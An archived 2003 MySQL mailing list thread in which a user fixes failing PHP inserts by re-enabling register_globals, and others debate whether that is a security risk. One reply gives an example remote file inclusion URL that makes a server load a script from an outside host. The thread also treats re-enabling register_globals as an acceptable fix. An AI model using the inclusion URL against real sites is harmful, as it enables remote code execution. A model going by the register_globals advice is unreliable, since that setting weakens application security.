Re: Can't insert data from Apache/PHP
> having register_globals 'on' is only a security risk if the code is sloppy. We're in agreement here, Jay. I see turning register_globals off as a band-aid fix for poor coding rather than a rule of thumb. That 'off' was made the default only recently emphasizes this, in my opinion. Edward Dudlik Becoming Digital www.becomingdigital.com - Original Message - From: "Jay Blanchard" <[EMAIL PROTECTED]> To: "CM Miller" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Wednesday, 11 June, 2003 08:04 Subject: RE: Can't insert data from Apache/PHP [snip] Sorry, but I am a bit behind on MySQL digest, but isn't turning Register Globals 'on' for php a security risk? [/snip] We recently had this discussion on the PHP-General list and the upshot is that having register_globals 'on' is only a security risk if the code is sloppy. PHP allows this as the variables are not strongly typed and most developer fail to do any checking of variables to make sure that they contain what they want them to contain. Turning register_globals 'off' does not take care of that. It just adds another layer of abstraction to certain vaariables (such as GET, POST, etc) which is still vulnerable if the developer does not do a good job of taking care with his or her variables. HTH! Jay -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
On Tuesday 10 June 2003 22:49, CM Miller wrote: > > globals >back to ON. > > Sorry, but I am a bit behind on MySQL digest, but > isn't turning Register Globals 'on' for php a security > risk? Yes. He needs to take a look at the documentation on the PHP website. I also sent instructions on how to make things work by reading the $_POST and $_GET and $_SERVER variables. I also have a couple of code snippets to remove other potential offending characters from input. Curtis -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
RE: Can't insert data from Apache/PHP
[snip] Sorry, but I am a bit behind on MySQL digest, but isn't turning Register Globals 'on' for php a security risk? [/snip] We recently had this discussion on the PHP-General list and the upshot is that having register_globals 'on' is only a security risk if the code is sloppy. PHP allows this as the variables are not strongly typed and most developer fail to do any checking of variables to make sure that they contain what they want them to contain. Turning register_globals 'off' does not take care of that. It just adds another layer of abstraction to certain vaariables (such as GET, POST, etc) which is still vulnerable if the developer does not do a good job of taking care with his or her variables. HTH! Jay -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
>I started troubleshooting the code and discovered the >problem was the >new >register globals which is defaulted to off in PHP 4.22. >The PHP >wasn't >holding session and wasn't inserting the records into >the mySQL >database. >I got it working now by switching the register globals >back to ON. Sorry, but I am a bit behind on MySQL digest, but isn't turning Register Globals 'on' for php a security risk? Here was an example given at our local php meetup meeting: Local index.php: Remote cracked.php: URL: http://localwebserver.com/index.php?page=offsite.com/cracked.php = GTFG GAIM ID: cmmiller1973 __ Do you Yahoo!? Yahoo! Calendar - Free online calendar with sync to Outlook(TM). http://calendar.yahoo.com -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
Oh sorry...my bad. :) I started troubleshooting the code and discovered the problem was the new register globals which is defaulted to off in PHP 4.22. The PHP wasn't holding session and wasn't inserting the records into the mySQL database. I got it working now by switching the register globals back to ON. - Original Message - From: "Becoming Digital" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, June 08, 2003 1:35 AM Subject: Re: Can't insert data from Apache/PHP > So the next step would be to provide us with the code so that we might try to > help you. :) > > Edward Dudlik > Becoming Digital > www.becomingdigital.com > > > - Original Message - > From: "ComCity" <[EMAIL PROTECTED]> > To: "Becoming Digital" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Sent: Sunday, 08 June, 2003 01:55 > Subject: Re: Can't insert data from Apache/PHP > > > Yep...figured that out. > > Thank You > > - Original Message - > From: "Becoming Digital" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Saturday, June 07, 2003 6:48 PM > Subject: Re: Can't insert data from Apache/PHP > > > > That points to a fault in your coding because phpMyAdmin *is* PHP running > via > > the web server. > > > > Edward Dudlik > > Becoming Digital > > www.becomingdigital.com > > > > > > - Original Message - > > From: "ComCity" <[EMAIL PROTECTED]> > > To: <[EMAIL PROTECTED]> > > Sent: Saturday, 07 June, 2003 21:09 > > Subject: More: Can't insert data from Apache/PHP > > > > > > It looks like I can insert data through phpMyadmin without issue. The > only > > place I can't insert data is through PHP running via the web server. > > > > To: <[EMAIL PROTECTED]> > > Sent: Saturday, June 07, 2003 5:03 PM > > Subject: Can't insert data from Apache/PHP > > > > > > > I've had to reinstall Linux/Apache and mySQL. The databases are > restored, > > > the data looks to be there, the permissions look to be there. However, > I > > > can't seem "INSERT" data into the tablesits the only thing I can't > > > do...and I don't see a problem with the permissions. Don't get any > errors > > > on the webpage but nothing happens. If I do a select, it works just > fine. > > > I have the database permissions set wide open for troubleshooting. > > > > > > > > > RWL > > > owner X XX > > > group X XX > > > other X XX > > > > > > Owner= mysql > > > group= mysql > > > > > > What am I missing? Its got to be something stupid and something > small > > > > > > Thank You very much. > > > Michael B. > > > > > > > > > -- > > MySQL General Mailing List > > For list archives: http://lists.mysql.com/mysql > > To unsubscribe: > http://lists.mysql.com/[EMAIL PROTECTED] > > > > > > > > > > > > -- > > MySQL General Mailing List > > For list archives: http://lists.mysql.com/mysql > > To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe: http://lists.mysql.com/[EMAIL PROTECTED] > > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] > -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
So the next step would be to provide us with the code so that we might try to help you. :) Edward Dudlik Becoming Digital www.becomingdigital.com - Original Message - From: "ComCity" <[EMAIL PROTECTED]> To: "Becoming Digital" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Sunday, 08 June, 2003 01:55 Subject: Re: Can't insert data from Apache/PHP Yep...figured that out. Thank You - Original Message - From: "Becoming Digital" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Saturday, June 07, 2003 6:48 PM Subject: Re: Can't insert data from Apache/PHP > That points to a fault in your coding because phpMyAdmin *is* PHP running via > the web server. > > Edward Dudlik > Becoming Digital > www.becomingdigital.com > > > - Original Message - > From: "ComCity" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Saturday, 07 June, 2003 21:09 > Subject: More: Can't insert data from Apache/PHP > > > It looks like I can insert data through phpMyadmin without issue. The only > place I can't insert data is through PHP running via the web server. > > To: <[EMAIL PROTECTED]> > Sent: Saturday, June 07, 2003 5:03 PM > Subject: Can't insert data from Apache/PHP > > > > I've had to reinstall Linux/Apache and mySQL. The databases are restored, > > the data looks to be there, the permissions look to be there. However, I > > can't seem "INSERT" data into the tablesits the only thing I can't > > do...and I don't see a problem with the permissions. Don't get any errors > > on the webpage but nothing happens. If I do a select, it works just fine. > > I have the database permissions set wide open for troubleshooting. > > > > > > RWL > > owner X XX > > group X XX > > other X XX > > > > Owner= mysql > > group= mysql > > > > What am I missing? Its got to be something stupid and something small > > > > Thank You very much. > > Michael B. > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe: http://lists.mysql.com/[EMAIL PROTECTED] > > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] > -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
Yep...figured that out. Thank You - Original Message - From: "Becoming Digital" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Saturday, June 07, 2003 6:48 PM Subject: Re: Can't insert data from Apache/PHP > That points to a fault in your coding because phpMyAdmin *is* PHP running via > the web server. > > Edward Dudlik > Becoming Digital > www.becomingdigital.com > > > - Original Message - > From: "ComCity" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Saturday, 07 June, 2003 21:09 > Subject: More: Can't insert data from Apache/PHP > > > It looks like I can insert data through phpMyadmin without issue. The only > place I can't insert data is through PHP running via the web server. > > To: <[EMAIL PROTECTED]> > Sent: Saturday, June 07, 2003 5:03 PM > Subject: Can't insert data from Apache/PHP > > > > I've had to reinstall Linux/Apache and mySQL. The databases are restored, > > the data looks to be there, the permissions look to be there. However, I > > can't seem "INSERT" data into the tablesits the only thing I can't > > do...and I don't see a problem with the permissions. Don't get any errors > > on the webpage but nothing happens. If I do a select, it works just fine. > > I have the database permissions set wide open for troubleshooting. > > > > > > RWL > > owner X XX > > group X XX > > other X XX > > > > Owner= mysql > > group= mysql > > > > What am I missing? Its got to be something stupid and something small > > > > Thank You very much. > > Michael B. > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe: http://lists.mysql.com/[EMAIL PROTECTED] > > > > > > -- > MySQL General Mailing List > For list archives: http://lists.mysql.com/mysql > To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] > -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Re: Can't insert data from Apache/PHP
That points to a fault in your coding because phpMyAdmin *is* PHP running via the web server. Edward Dudlik Becoming Digital www.becomingdigital.com - Original Message - From: "ComCity" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Saturday, 07 June, 2003 21:09 Subject: More: Can't insert data from Apache/PHP It looks like I can insert data through phpMyadmin without issue. The only place I can't insert data is through PHP running via the web server. To: <[EMAIL PROTECTED]> Sent: Saturday, June 07, 2003 5:03 PM Subject: Can't insert data from Apache/PHP > I've had to reinstall Linux/Apache and mySQL. The databases are restored, > the data looks to be there, the permissions look to be there. However, I > can't seem "INSERT" data into the tablesits the only thing I can't > do...and I don't see a problem with the permissions. Don't get any errors > on the webpage but nothing happens. If I do a select, it works just fine. > I have the database permissions set wide open for troubleshooting. > > > RWL > owner X XX > group X XX > other X XX > > Owner= mysql > group= mysql > > What am I missing? Its got to be something stupid and something small > > Thank You very much. > Michael B. > -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED] -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
More: Can't insert data from Apache/PHP
It looks like I can insert data through phpMyadmin without issue. The only place I can't insert data is through PHP running via the web server. To: <[EMAIL PROTECTED]> Sent: Saturday, June 07, 2003 5:03 PM Subject: Can't insert data from Apache/PHP > I've had to reinstall Linux/Apache and mySQL. The databases are restored, > the data looks to be there, the permissions look to be there. However, I > can't seem "INSERT" data into the tablesits the only thing I can't > do...and I don't see a problem with the permissions. Don't get any errors > on the webpage but nothing happens. If I do a select, it works just fine. > I have the database permissions set wide open for troubleshooting. > > > RWL > owner X XX > group X XX > other X XX > > Owner= mysql > group= mysql > > What am I missing? Its got to be something stupid and something small > > Thank You very much. > Michael B. > -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
Can't insert data from Apache/PHP
I've had to reinstall Linux/Apache and mySQL. The databases are restored, the data looks to be there, the permissions look to be there. However, I can't seem "INSERT" data into the tablesits the only thing I can't do...and I don't see a problem with the permissions. Don't get any errors on the webpage but nothing happens. If I do a select, it works just fine. I have the database permissions set wide open for troubleshooting. RWL owner X XX group X XX other X XX Owner= mysql group= mysql What am I missing? Its got to be something stupid and something small Thank You very much. Michael B. -- MySQL General Mailing List For list archives: http://lists.mysql.com/mysql To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]
